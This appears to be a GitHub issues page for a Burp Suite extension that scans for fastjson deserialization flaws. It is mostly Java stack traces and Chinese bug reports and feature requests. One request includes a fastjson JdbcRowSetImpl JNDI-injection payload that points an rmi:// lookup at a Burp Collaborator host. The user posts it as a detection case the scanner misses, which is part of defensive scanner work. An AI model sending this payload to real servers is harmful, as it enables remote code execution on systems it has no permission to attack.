at burp.fdg.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addImpl(Container.java:1150)
at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:756)
at burp.r3.a(Unknown Source)
at burp.r3.insertTab(Unknown Source)
at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:830)
at burp.dn1.a(Unknown Source)
at burp.b9n.c(Unknown Source)
at burp.b9n.lambda$extensionConfigChanged$5(Unknown Source)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:318)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:771)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:722)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:716)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:399)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:86)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:741)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)

BUG?

最新版本 2020.12.1 貌似不支持
1
2

java.lang.NullPointerException 怎么解决....

java.lang.NullPointerException
at burp.eyw.ao(Unknown Source)
at burp.atf.getHttpService(Unknown Source)
at burp.hek.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:346)
at burp.eh9.a(Unknown Source)
at burp.feh.a(Unknown Source)
at burp.feh.a(Unknown Source)
at burp.h0v.b(Unknown Source)
at burp.cpv.a(Unknown Source)
at burp.feh.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addNotify(Container.java:2796)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4784)
at java.desktop/java.awt.Container.addNotify(Container.java:2796)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4784)
at java.desktop/java.awt.Container.addNotify(Container.java:2796)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4784)
at java.desktop/java.awt.Container.addImpl(Container.java:1142)
at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:730)
at burp.fe3.a(Unknown Source)
at burp.fe3.insertTab(Unknown Source)
at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:804)
at burp.es1.a(Unknown Source)
at burp.h0v.c(Unknown Source)
at burp.h0v.a(Unknown Source)
at burp.ep_.a(Unknown Source)
at burp.cnz.addSuiteTab(Unknown Source)
at burp.b8p.addSuiteTab(Unknown Source)
at burp.fms.addSuiteTab(Unknown Source)
at burp.Tags$1.run(Tags.java:71)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:313)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:764)
at java.desktop/java.awt.EventQueue.access$500(EventQueue.java:97)
at java.desktop/java.awt.EventQueue$3.run(EventQueue.java:717)
at java.desktop/java.awt.EventQueue$3.run(EventQueue.java:711)
at java.base/java.security.AccessController.doPrivileged(Native Method)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:89)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:734)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:199)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
java.lang.NullPointerException
at burp.eyw.ao(Unknown Source)
at burp.atf.getHttpService(Unknown Source)
at burp.hek.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:346)
at burp.eh9.a(Unknown Source)
at burp.feh.a(Unknown Source)
at burp.feh.a(Unknown Source)
at burp.h0v.b(Unknown Source)
at burp.cpv.a(Unknown Source)
at burp.feh.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addNotify(Container.java:2796)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4784)
at java.desktop/java.awt.Container.addNotify(Container.java:2796)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4784)
at java.desktop/java.awt.Container.addNotify(Container.java:2796)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4784)
at java.desktop/java.awt.Container.addImpl(Container.java:1142)
at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:730)
at burp.fe3.a(Unknown Source)
at burp.fe3.insertTab(Unknown Source)
at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:804)
at burp.es1.a(Unknown Source)
at burp.h0v.c(Unknown Source)
at burp.h0v.a(Unknown Source)
at burp.ep_.a(Unknown Source)
at burp.cnz.addSuiteTab(Unknown Source)
at burp.b8p.addSuiteTab(Unknown Source)
at burp.fms.addSuiteTab(Unknown Source)
at burp.Tags$1.run(Tags.java:71)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:313)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:764)
at java.desktop/java.awt.EventQueue.access$500(EventQueue.java:97)
at java.desktop/java.awt.EventQueue$3.run(EventQueue.java:717)
at java.desktop/java.awt.EventQueue$3.run(EventQueue.java:711)
at java.base/java.security.AccessController.doPrivileged(Native Method)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:89)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:734)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:199)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)

报错

java.lang.NullPointerException at burp.h9h.a(Unknown Source) at burp.e3b.getHttpService(Unknown Source) at burp.g65.getHttpService(Unknown Source) at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:346) at burp.gcc.a(Unknown Source) at burp.dwz.a(Unknown Source) at burp.dwz.a(Unknown Source) at burp.co7.b(Unknown Source) at burp.efw.a(Unknown Source) at burp.dwz.addNotify(Unknown Source) at java.desktop/java.awt.Container.addImpl(Container.java:1146) at java.desktop/java.awt.Container.add(Container.java:997) at burp.dw7.h(Unknown Source) at burp.dw7.a(Unknown Source) at burp.dw7.a(Unknown Source) at burp.dw7.lambda$layoutInitialised$2(Unknown Source) at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:316) at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770) at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721) at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715) at java.base/java.security.AccessController.doPrivileged(AccessController.java:391) at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85) at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740) at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203) at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124) at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113) at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109) at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101) at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90) java.lang.NullPointerException at burp.h9h.a(Unknown Source) at burp.e3b.getHttpService(Unknown Source) at burp.g65.getHttpService(Unknown Source) at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:346) at burp.gcc.a(Unknown Source) at burp.dwz.a(Unknown Source) at burp.dwz.a(Unknown Source) at burp.co7.b(Unknown Source) at burp.efw.a(Unknown Source) at burp.dwz.addNotify(Unknown Source) at java.desktop/java.awt.Container.addImpl(Container.java:1146) at java.desktop/java.awt.Container.add(Container.java:997) at burp.dw7.h(Unknown Source) at burp.dw7.a(Unknown Source) at burp.dw7.a(Unknown Source) at burp.dw7.lambda$layoutInitialised$2(Unknown Source) at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:316) at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770) at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721) at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715) at java.base/java.security.AccessController.doPrivileged(AccessController.java:391) at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85) at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740) at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203) at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124) at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113) at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109) at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101) at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90) java.lang.NullPointerException at burp.h9h.a(Unknown Source) at burp.e3b.getHttpService(Unknown Source) at burp.g65.getHttpService(Unknown Source) at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:346) at burp.gcc.a(Unknown Source) at burp.dwz.a(Unknown Source) at burp.dwz.a(Unknown Source) at burp.co7.b(Unknown Source) at burp.efw.a(Unknown Source) at burp.dwz.addNotify(Unknown Source) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addImpl(Container.java:1146) at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:754) at burp.a3b.a(Unknown Source) at burp.a3b.insertTab(Unknown Source) at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:828) at burp.fz9.a(Unknown Source) at burp.co7.b(Unknown Source) at burp.co7.c(Unknown Source) at burp.avq.a(Unknown Source) at burp.aqd.addSuiteTab(Unknown Source) at burp.lq.addSuiteTab(Unknown Source) at burp.a3i.addSuiteTab(Unknown Source) at burp.BurpExtender$1.run(BurpExtender.java:112) at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:316) at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770) at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721) at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715) at java.base/java.security.AccessController.doPrivileged(AccessController.java:391) at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85) at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740) at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203) at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124) at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113) at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109) at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101) at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90) java.lang.NullPointerException at burp.h9h.a(Unknown Source) at burp.e3b.getHttpService(Unknown Source) at burp.g65.getHttpService(Unknown Source) at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:346) at burp.gcc.a(Unknown Source) at burp.dwz.a(Unknown Source) at burp.dwz.a(Unknown Source) at burp.co7.b(Unknown Source) at burp.efw.a(Unknown Source) at burp.dwz.addNotify(Unknown Source) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addImpl(Container.java:1146) at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:754) at burp.a3b.a(Unknown Source) at burp.a3b.insertTab(Unknown Source) at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:828) at burp.fz9.a(Unknown Source) at burp.co7.b(Unknown Source) at burp.co7.c(Unknown Source) at burp.avq.a(Unknown Source) at burp.aqd.addSuiteTab(Unknown Source) at burp.lq.addSuiteTab(Unknown Source) at burp.a3i.addSuiteTab(Unknown Source) at burp.BurpExtender$1.run(BurpExtender.java:112) at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:316) at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770) at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721) at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715) at java.base/java.security.AccessController.doPrivileged(AccessController.java:391) at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85) at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740) at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203) at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124) at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113) at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109) at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101) at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)

image

加载既报错,同样的包别人能检测出来,但我检测不出来,2020.12.1版本,win10

换了其他版本也是一样

[feature request] 优化输出

image

例如的request no json 以及 request json no eligible 可以折叠或者隐藏不输出, 或者输出到log里 而非在ui中输出.

DNS平台问题

不知道为啥,配置文件显示使用 dnslog.cn 的,但是logger里面显示扫描使用的是 oastify.com 的域名。
image

需求

这样的传参请求无法检测出来:

https://test.baidu.com:443/post_server/nptts?message=%7B%22text%22:%221111%22,%22speakerid%22:0,%22type%22:%221%22,%22vol%22:%220.7%22%7D

或者POST:

POST /sss/sss HTTP/1.1
Host: test.baidu.com
Connection: close
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://test.baidu.com/sss/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 240

message={"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://a5gx8q8rbj06ug75b78wihfmyd43ss.burpcollaborator.net/hello","autoCommit":true}}, "poc":11}

手动burp + dnslog测试展示:

image

检测机制

检测机制是否可以改为根据response包返回是否为“json或xml”来判断更准确一点?因为可能有些站点接口默认是不传参的,这样就漏掉了。

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.